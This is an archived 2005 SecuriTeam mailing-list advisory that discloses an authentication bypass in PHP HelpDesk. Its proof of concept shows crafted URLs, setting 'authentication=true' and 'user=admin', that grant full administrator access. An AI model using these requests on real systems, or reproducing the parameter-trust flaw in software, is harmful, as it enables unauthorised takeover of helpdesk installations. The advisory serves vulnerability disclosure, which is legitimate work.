[UNIX] PHP HelpDesk Authentication Bypass (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 10/11/05

  • Next message: SecuriTeam: "[REVS] Smack the Stack - Advanced Buffer Overflow Methods (Virtual Address)" 
    To: list@securiteam.com
Date: 11 Oct 2005 12:05:54 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      PHP HelpDesk Authentication Bypass (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

     <https://sourceforge.net/projects/phphelpdesk/> PHP Helpdesk is "a tool
    that allows administrators to handle tasks related to their organisation.
    This tool is used to record and monitor the progress of tasks assigned to
    people. This is an excellent and simple tool for handling tasks". PHP
    Helpdesk has a fault in the implementation of the cookie values set. Using
    crafted URL's it is possible to get full access to the system.

    DETAILS

    Proof of Concept:
    Access a site that holds the login to PHP HelpDesk
    http://www.target.com/helpdesk/index.php

    Change the system so that you are authenticated
    http://www.target.com/helpdesk/index.php?authentication=true

    Up you privileges to admin
    http://www.target.com/helpdesk/index.php?authentication=true&user=admin

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:taylorg@southport-college.ac.uk> Garry Taylor.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[REVS] Smack the Stack - Advanced Buffer Overflow Methods (Virtual Address)"

    Relevant Pages

    • [TOOL] Metacortex - PacketFilter GUI
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [UNIX] osCommerces File Manager Arbitrary File Disclosure
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [TOOL] Aanval - Web Based Snort Console
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NEWS] MyServer DoS (Long GET request)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [UNIX] Cross Site Scripting in Moodle
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)